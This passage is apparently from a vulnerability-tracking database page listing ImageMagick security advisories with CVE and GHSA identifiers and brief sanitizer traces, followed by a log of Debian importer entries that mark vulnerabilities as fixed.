VCID-y2pd-cxmz-6yfp security update CVE-2017-14607
VCID-y3xr-bv9y-mqb5 ImageMagick: Assertion failure in the function DestroyImage CVE-2017-12670
VCID-y4hn-6bv6-jugw ImageMagick: MSL attribute stack buffer overflow leads to out of bounds write. A stack buffer overflow occurs when processing the an attribute in msl.c. A long value overflows a fixed-size stack buffer, leading to memory corruption. ``` ================================================================= ==278522==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdb8c76984 at pc 0x55a4bf16f507 bp 0x7ffdb8c75bc0 sp 0x7ffdb8c75bb0 WRITE of size 1 at 0x7ffdb8c76984 thread T0 ``` CVE-2026-25968
GHSA-3mwp-xqp2-q6ph
VCID-y58b-be93-hbfd ImageMagick: Write heap-buffer-overflow in PCL encoder via undersized output buffer A heap-buffer-overflow vulnerability exists in the PCL encode due to an undersized output buffer allocation. ``` WRITE of size 1 at 0x7e79f91f31a0 thread T0 ``` CVE-2026-28686
GHSA-467j-76j7-5885
VCID-y8aj-9qsj-7ucs ImageMagick: out of bound access in sun file CVE-2014-9829
VCID-yah4-bf7d-w7f4 ImageMagick: heap use-after-free issue in ReplaceXmpValue() function in MagickCore/profile.c. CVE-2023-34475
VCID-ybyx-4c24-aqb8 security update CVE-2016-10064
VCID-ydbk-11w9-wyen ImageMagick: Infinite loop in the ReadCAPTIONImage function CVE-2017-14741
VCID-yhmq-s1jh-17bh ImageMagick: out-of-bounds read in ReadHEICImageByID function in coders/heic.c CVE-2020-10251
VCID-yj6z-ege2-37gt ImageMagick: configuration files read from $CWD may allow arbitrary code execution CVE-2010-4167
VCID-ypyd-2tg4-xqb1 ImageMagick: memory leak in TIFFWritePhotoshopLayers function in coders/tiff.c CVE-2018-16641
VCID-yqzg-rzp1-bbgm Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14172
VCID-yspe-wj34-juck Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-32545
VCID-ytpg-f9mm-sbev ImageMagick: memory leak in magick/xwindow.c CVE-2019-16708
VCID-yub2-x8z7-d3e6 ImageMagick: Cipher leak when the calculating signatures in TransformSignatureof MagickCore/signature.c CVE-2021-20313
VCID-ywg5-azha-e7gt ImageMagick: Out-of-bounds buffer read by copying image bytes for TIFF images with crafted TIFF EXIF IFD value CVE-2012-1798
VCID-yx7r-r7ez-7uhp ImageMagick: Code Injection via PostScript header in ps coders The ps encoders, responsible for writing PostScript files, fails to sanitize the input before writing it into the PostScript header. An attacker can provide a malicious file and inject arbitrary PostScript code. When the resulting file is processed by a printer or a viewer (like Ghostscript), the injected code is interpreted and executed. The html encoder does not properly escape strings that are written to in the html document. An attacker can provide a malicious file and injection arbitrary html code. CVE-2026-25797
GHSA-rw6c-xp26-225v
VCID-yxwd-j8uj-tudx security update CVE-2017-12587
VCID-yz4e-znfx-zqhe ImageMagick: additional PNM sanity checks CVE-2014-9837
VCID-z3q2-pgdm-wfbz Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-10145
VCID-z7e5-pt2s-x3a5 security update CVE-2019-10650
VCID-z9t9-bxf9-hkfk ImageMagick has memory leak of watermark Image object in ReadSTEGANOImage on multiple error/early-return paths ### Summary In `ReadSTEGANOImage()` (`coders/stegano.c`), the `watermark` Image object is not freed on three early-return paths, resulting in a definite memory leak (~13.5KB+ per invocation) that can be exploited for denial of service. ``` Direct leak of 13512 byte(s) in 1 object(s) allocated from: #0 0x7f5c11e27887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x55cdc38f65c4 in AcquireMagickMemory MagickCore/memory.c:536 #2 0x55cdc38f65eb in AcquireCriticalMemory MagickCore/memory.c:612 #3 0x55cdc3899e91 in AcquireImage MagickCore/image.c:154 ``` CVE-2026-25796
GHSA-g2pr-qxjg-7r2w
VCID-zab9-9tqj-hbhg ImageMagick: Memory allocation with excessive without limits in the internal SVG decoder A crafted SVG file containing an malicious element causes ImageMagick to attempt to allocate ~674 GB of memory, leading to an out-of-memory abort. Found via AFL++ fuzzing with afl-clang-lto instrumentation and AddressSanitizer. CVE-2026-25985
GHSA-v7g2-m8c5-mf84
VCID-zdu5-rtg2-pffb imagemagick: use of uninitialized value in function ReadPANGOImage in coders/pango.c CVE-2019-12978
VCID-zfw4-5zqw-huh7 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14175
VCID-zfy5-md9a-h3gy ImageMagick: filling memory during identification of image CVE-2014-9854
VCID-zh44-pz7k-abba ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps3.c CVE-2019-16712
VCID-zjgp-g783-d3hy ImageMagick: Memory leak in WritePDFImage function in coders/pdf.c CVE-2017-12662
VCID-znwq-9jw9-abgx Multiple vulnerabilities have been found in GraphicsMagick, allowing remote attackers to execute arbitrary code or cause a Denial of Service condition. CVE-2008-1097
VCID-zp6q-98qj-ykh1 ImagemMagick: Division by zero in WaveImage() of MagickCore/visual-effects.c CVE-2021-20309
VCID-zpcy-nms7-kuha ImageMagick has Integer Overflow leading to out of bounds write in SIXEL decoder An integer overflow vulnerability exists in the SIXEL decoer. The vulnerability allows an attacker to perform an out of bounds via a specially crafted mage. CVE-2026-28493
GHSA-r39q-jr8h-gcq2
VCID-zrkc-cfnt-r7hr ImageMagick: Memory leak in ReadYCBCRImage CVE-2018-10805
VCID-zrke-eysb-37e1 Vulnerabilities found in ImageMagick might allow remote attackers to execute arbitrary code. CVE-2012-0248
VCID-zrtt-8nnj-v3ch security update CVE-2017-11530
VCID-zs46-dubn-wfga ImageMagick: memory leak vulnerability in the function ReadMATImage in coders/mat.c CVE-2017-18027
VCID-zsxa-yvp8-93fr ImageMagick: NULL pointer dereference LoadOpenCLDevices function in MagickCore/opencl.c CVE-2017-18253
VCID-zszf-nytw-jqgx ImageMagick: NULL pointer dereference in the PostscriptDelegateMessage function CVE-2017-14624
VCID-zuht-nypg-33fg ImageMagick: double free in pdb coder CVE-2014-9807
VCID-zv8w-puzj-23cd ImageMagick: outside the range of representable values of type int and signed integer overflow in MagickCore/histogram.c CVE-2020-25666
VCID-zyg9-ad7g-ayex Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13131
VCID-zyh3-cmka-wqb8 ImageMagick: memory leak in psd handling CVE-2014-9842
VCID-zz1j-vw4k-ukdc security update CVE-2015-8958
VCID-zz57-zmka-33ev The X.Org X11 library contains multiple integer overflows, which could lead to the execution of arbitrary code. CVE-2007-1667

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-16T13:25:49.730011+00:00 Debian Importer Fixing VCID-qtmc-prbr-jbc9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T13:25:05.962879+00:00 Debian Importer Fixing VCID-pk4j-w1q9-vqd2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T13:24:53.889010+00:00 Debian Importer Fixing VCID-267c-s4sq-9bfw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T13:12:57.241138+00:00 Debian Importer Fixing VCID-k4w2-craz-13b9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T13:09:16.478095+00:00 Debian Importer Fixing VCID-uc6k-xc2v-kbas https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:57:52.507336+00:00 Debian Importer Fixing VCID-d74a-pd2n-6khw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:57:01.594095+00:00 Debian Importer Fixing VCID-2uq7-pcfv-d7hv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:54:46.246832+00:00 Debian Importer Fixing VCID-u29f-6tep-cfdr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:52:42.021382+00:00 Debian Importer Fixing VCID-bs5z-jh2d-nfgv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:49:04.121567+00:00 Debian Importer Fixing VCID-z9t9-bxf9-hkfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:48:43.691972+00:00 Debian Importer Fixing VCID-upce-8s7m-2kfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:47:41.186570+00:00 Debian Importer Fixing VCID-3yqe-cntb-t3fb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:46:57.981413+00:00 Debian Importer Fixing VCID-rzvc-hba1-zfcy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:46:37.759766+00:00 Debian Importer Fixing VCID-mxg1-261s-nbds https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:46:22.660934+00:00 Debian Importer Fixing VCID-32qk-mugj-73h4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:45:33.960020+00:00 Debian Importer Fixing VCID-dw5u-34qe-cuat https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:43:29.140356+00:00 Debian Importer Fixing VCID-w5bd-tn21-fqh7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:43:28.487681+00:00 Debian Importer Fixing VCID-xp3x-q8w4-myhb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:41:44.734661+00:00 Debian Importer Fixing VCID-fduk-nxtd-uya3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:40:57.925991+00:00 Debian Importer Fixing VCID-x65n-6vuk-4ufk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:40:55.990005+00:00 Debian Importer Fixing VCID-urv8-ve9y-e3b4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:37:15.834023+00:00 Debian Importer Fixing VCID-p4yb-mqca-v7c8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:34:23.177558+00:00 Debian Importer Fixing VCID-xfd9-xwru-aubv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:33:49.689052+00:00 Debian Importer Fixing VCID-vguv-n176-k3ch https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:33:31.742075+00:00 Debian Importer Fixing VCID-xbsu-ac6g-53fn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:33:19.525589+00:00 Debian Importer Fixing VCID-tnb2-7mvf-sqdk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:31:58.198031+00:00 Debian Importer Fixing VCID-dkf5-8kww-mkhn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:31:11.186350+00:00 Debian Importer Fixing VCID-ujad-kteu-sfdu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:30:57.730661+00:00 Debian Importer Fixing VCID-f9z9-h8bt-9bg7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:30:06.664393+00:00 Debian Importer Fixing VCID-6nrh-wh65-nben https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:28:19.944129+00:00 Debian Importer Fixing VCID-8n3f-ass1-97gj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:28:14.306142+00:00 Debian Importer Fixing VCID-fx9z-gbbd-q7aq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:25:25.797742+00:00 Debian Importer Fixing VCID-cmym-m1da-f3fg https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:24:56.607234+00:00 Debian Importer Fixing VCID-ydbk-11w9-wyen https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:24:50.782815+00:00 Debian Importer Fixing VCID-px2h-8ag6-s3ec https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:24:37.925092+00:00 Debian Importer Fixing VCID-3gtv-1gg5-5fh2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:23:31.105013+00:00 Debian Importer Fixing VCID-7mqx-nap6-97cr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:22:51.642597+00:00 Debian Importer Fixing VCID-w9dc-fbc3-mudv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:21:14.093921+00:00 Debian Importer Fixing VCID-je9u-1h5v-hbct https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:21:13.258325+00:00 Debian Importer Fixing VCID-u9v8-n717-fyag https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:20:00.258724+00:00 Debian Importer Fixing VCID-hmcd-f6k1-kkd4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:19:55.204580+00:00 Debian Importer Fixing VCID-mhbe-8x14-f3d6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:19:03.300343+00:00 Debian Importer Fixing VCID-1rg8-dsrg-jbet https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:18:34.793163+00:00 Debian Importer Fixing VCID-znwq-9jw9-abgx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:18:15.265481+00:00 Debian Importer Fixing VCID-ge69-ta6r-e3cj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:16:41.541150+00:00 Debian Importer Fixing VCID-ywg5-azha-e7gt https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:16:35.721028+00:00 Debian Importer Fixing VCID-mg1t-vz1h-47b9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:16:17.956750+00:00 Debian Importer Fixing VCID-uf32-kpa6-fqe5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:15:04.647783+00:00 Debian Importer Fixing VCID-38vp-3yf8-aue8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:14:41.774449+00:00 Debian Importer Fixing VCID-hz8y-hdp6-t3bx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:14:16.592639+00:00 Debian Importer Fixing VCID-vzhq-5h21-xuhk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:13:34.526137+00:00 Debian Importer Fixing VCID-s4cu-swuc-9fh4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:12:02.364271+00:00 Debian Importer Fixing VCID-mmw7-4m3z-2kcn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:11:43.743962+00:00 Debian Importer Fixing VCID-bgej-fguz-9fcv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:11:36.120598+00:00 Debian Importer Fixing VCID-c8rr-y6zy-h7h5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:11:19.568285+00:00 Debian Importer Fixing VCID-dge7-469z-u7gq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:11:13.154458+00:00 Debian Importer Fixing VCID-j1hu-4c4d-ske6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:11:04.255596+00:00 Debian Importer Fixing VCID-twq8-ntkg-zbfk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:10:58.987877+00:00 Debian Importer Fixing VCID-b43n-3d1g-u3fe https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:09:34.812042+00:00 Debian Importer Fixing VCID-s293-ewpe-3ufa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:09:31.366406+00:00 Debian Importer Fixing VCID-yxwd-j8uj-tudx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:08:53.548598+00:00 Debian Importer Fixing VCID-tzpa-13fk-7kc9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:08:06.470278+00:00 Debian Importer Fixing VCID-mpqt-5tap-57g1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:07:34.005229+00:00 Debian Importer Fixing VCID-57gx-fkgs-f7cb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:06:11.778603+00:00 Debian Importer Fixing VCID-887b-1pwe-nqdd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:05:39.816809+00:00 Debian Importer Fixing VCID-fykb-qjuw-3qcj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:04:35.746174+00:00 Debian Importer Fixing VCID-x9m3-pune-akdj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:03:07.086722+00:00 Debian Importer Fixing VCID-xgzr-fhu9-myed https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:01:59.975055+00:00 Debian Importer Fixing VCID-ee5d-s8eb-tbdn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:01:46.491090+00:00 Debian Importer Fixing VCID-ybyx-4c24-aqb8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T12:01:38.078867+00:00 Debian Importer Fixing VCID-x998-fhs5-93ht https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:59:38.603777+00:00 Debian Importer Fixing VCID-s7tx-uu27-xqb5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:59:12.396319+00:00 Debian Importer Fixing VCID-4az8-8361-7bg2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:58:19.802256+00:00 Debian Importer Fixing VCID-a4jk-v4s2-r7dy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:58:03.424311+00:00 Debian Importer Fixing VCID-mwf4-u6v6-zqdu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:57:28.901735+00:00 Debian Importer Fixing VCID-834e-c7gn-afac https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:56:02.718155+00:00 Debian Importer Fixing VCID-5sxs-wpy9-rqfn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:55:35.308846+00:00 Debian Importer Fixing VCID-bw4q-dt1r-y3e4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:55:06.046279+00:00 Debian Importer Fixing VCID-ajsf-6r6w-juey https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:55:03.168833+00:00 Debian Importer Fixing VCID-v7m7-26bu-wfer https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:55:02.289373+00:00 Debian Importer Fixing VCID-fvws-m1ay-aud1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:54:51.650175+00:00 Debian Importer Fixing VCID-5fc9-tutn-dubw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:54:50.712526+00:00 Debian Importer Fixing VCID-crpp-9mt6-nbb6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:54:48.485449+00:00 Debian Importer Fixing VCID-rj9n-ra1t-77dy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:54:42.023570+00:00 Debian Importer Fixing VCID-qkwb-2fep-gba7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:54:11.916284+00:00 Debian Importer Fixing VCID-7jvc-54zg-pbcz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:53:44.226677+00:00 Debian Importer Fixing VCID-bhkh-rppj-1bb5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:52:30.907645+00:00 Debian Importer Fixing VCID-dr7r-hah7-vfdv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:51:13.054200+00:00 Debian Importer Fixing VCID-m2q5-rtqv-tudu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:51:04.518999+00:00 Debian Importer Fixing VCID-u45q-eheh-6kak https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:50:21.420744+00:00 Debian Importer Fixing VCID-vpdn-g1k9-1kdn https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:50:17.533168+00:00 Debian Importer Fixing VCID-dkzb-3u3f-yuee https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:49:14.409749+00:00 Debian Importer Fixing VCID-z3q2-pgdm-wfbz https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:48:13.642383+00:00 Debian Importer Fixing VCID-v24g-h7t5-nbec https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:47:50.262413+00:00 Debian Importer Fixing VCID-6zuv-uh18-k3c1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:47:13.551248+00:00 Debian Importer Fixing VCID-pp81-c241-rbb5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:47:03.275953+00:00 Debian Importer Fixing VCID-2gw3-qfan-jygd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:46:11.022441+00:00 Debian Importer Fixing VCID-9h1k-h8gw-hkat https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:46:08.170853+00:00 Debian Importer Fixing VCID-hgfv-dtsx-hbdx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:45:31.797570+00:00 Debian Importer Fixing VCID-vkp6-wh22-eqap https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:45:13.011318+00:00 Debian Importer Fixing VCID-4f97-2smu-6qfc https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:45:07.025614+00:00 Debian Importer Fixing VCID-x7us-26aq-3yf8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:44:57.919717+00:00 Debian Importer Fixing VCID-1x5f-2jf7-hbb2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:44:03.404703+00:00 Debian Importer Fixing VCID-dfzv-wzru-w3gx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:43:33.800051+00:00 Debian Importer Fixing VCID-rypf-qy6p-3bac https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:43:14.158301+00:00 Debian Importer Fixing VCID-3zbe-p6ue-ffe8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:42:36.331937+00:00 Debian Importer Fixing VCID-33k9-ygup-9fb3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:42:33.240672+00:00 Debian Importer Fixing VCID-vv56-v3c7-kfa1 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:42:29.208614+00:00 Debian Importer Fixing VCID-khv9-9he8-ykbf https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:41:42.570648+00:00 Debian Importer Fixing VCID-3pw2-zq6a-2khx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:39:24.399029+00:00 Debian Importer Fixing VCID-12rd-dhh3-h3ea https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:38:00.381519+00:00 Debian Importer Fixing VCID-uayc-3r68-tudp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:37:12.520438+00:00 Debian Importer Fixing VCID-pbvz-djcm-67eh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:36:41.652482+00:00 Debian Importer Fixing VCID-umnw-ksa8-9ua8 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:36:39.423982+00:00 Debian Importer Fixing VCID-8yfc-gunh-17a2 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:36:27.923128+00:00 Debian Importer Fixing VCID-wwxb-6psb-xybx https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:36:09.385364+00:00 Debian Importer Fixing VCID-1gqw-pheb-hfey https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:35:17.581017+00:00 Debian Importer Fixing VCID-mhxv-hu2v-ukeb https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:35:05.817639+00:00 Debian Importer Fixing VCID-5gug-qb5f-rkae https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:34:47.106831+00:00 Debian Importer Fixing VCID-872v-6z75-jucm https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:34:17.422480+00:00 Debian Importer Fixing VCID-38u3-s4ys-bue5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:33:46.420700+00:00 Debian Importer Fixing VCID-39mw-qs6j-83eu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:33:13.001509+00:00 Debian Importer Fixing VCID-t75h-4xfn-h7cd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:32:55.051011+00:00 Debian Importer Fixing VCID-zsxa-yvp8-93fr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:32:43.119987+00:00 Debian Importer Fixing VCID-y4hn-6bv6-jugw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:27:19.323157+00:00 Debian Importer Fixing VCID-w1s1-4kv8-5bca https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:26:52.666388+00:00 Debian Importer Fixing VCID-73j4-24p8-pbe5 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:26:47.622672+00:00 Debian Importer Fixing VCID-jz9p-mte7-vfb3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:26:15.501679+00:00 Debian Importer Fixing VCID-sywj-rqp4-23dd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:26:08.974082+00:00 Debian Importer Fixing VCID-7bjy-zdas-9yfv https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:25:53.443513+00:00 Debian Importer Fixing VCID-8j37-fwz2-bfea https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:25:33.362866+00:00 Debian Importer Fixing VCID-xaef-x656-fqfq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:24:44.139069+00:00 Debian Importer Fixing VCID-7f35-ha1p-bbby https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:23:58.081099+00:00 Debian Importer Fixing VCID-aej5-sgf8-7uhp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:22:36.731733+00:00 Debian Importer Fixing VCID-dqjz-99u6-uyh3 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:21:27.082824+00:00 Debian Importer Fixing VCID-1yte-8nb7-fqaw https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:21:22.845966+00:00 Debian Importer Fixing VCID-n6gp-848w-nbam https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:21:20.819195+00:00 Debian Importer Fixing VCID-ekgu-5zg9-2uaa https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:20:31.602564+00:00 Debian Importer Fixing VCID-wk4h-a1su-wfbh https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:20:23.871094+00:00 Debian Importer Fixing VCID-ryu7-2nsu-kqf6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:19:58.970484+00:00 Debian Importer Fixing VCID-fq6e-k53f-jugt https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:18:57.822492+00:00 Debian Importer Fixing VCID-hx15-dy4p-uycu https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:18:01.649662+00:00 Debian Importer Fixing VCID-swqu-wape-83bj https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:17:28.313120+00:00 Debian Importer Fixing VCID-hzr4-8x4m-87cy https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:17:10.717847+00:00 Debian Importer Fixing VCID-ptej-pfyn-z3aq https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:16:57.666361+00:00 Debian Importer Fixing VCID-152y-9pjj-p7b7 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:16:50.686884+00:00 Debian Importer Fixing VCID-f1zu-xb4j-8qhp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:16:18.490058+00:00 Debian Importer Fixing VCID-h6hy-g7da-1yg4 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:16:10.100367+00:00 Debian Importer Fixing VCID-7fmu-6e6q-r7hd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:15:35.814508+00:00 Debian Importer Fixing VCID-98sh-zs45-hyag https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:15:15.519729+00:00 Debian Importer Fixing VCID-6hay-bjuv-nygd https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:15:09.334286+00:00 Debian Importer Fixing VCID-cuyh-2uau-1yad https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:14:50.051740+00:00 Debian Importer Fixing VCID-477e-a2hz-aqb9 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:14:17.312284+00:00 Debian Importer Fixing VCID-93a6-7956-v3ar https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:14:17.066409+00:00 Debian Importer Fixing VCID-wwam-wq1v-1fec https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:13:58.954623+00:00 Debian Importer Fixing VCID-m9bk-66wv-vqbk https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:12:44.964551+00:00 Debian Importer Fixing VCID-g6mw-mvbu-fbcs https://security-tracker.debian.org/tracker/data/json 38.4.0
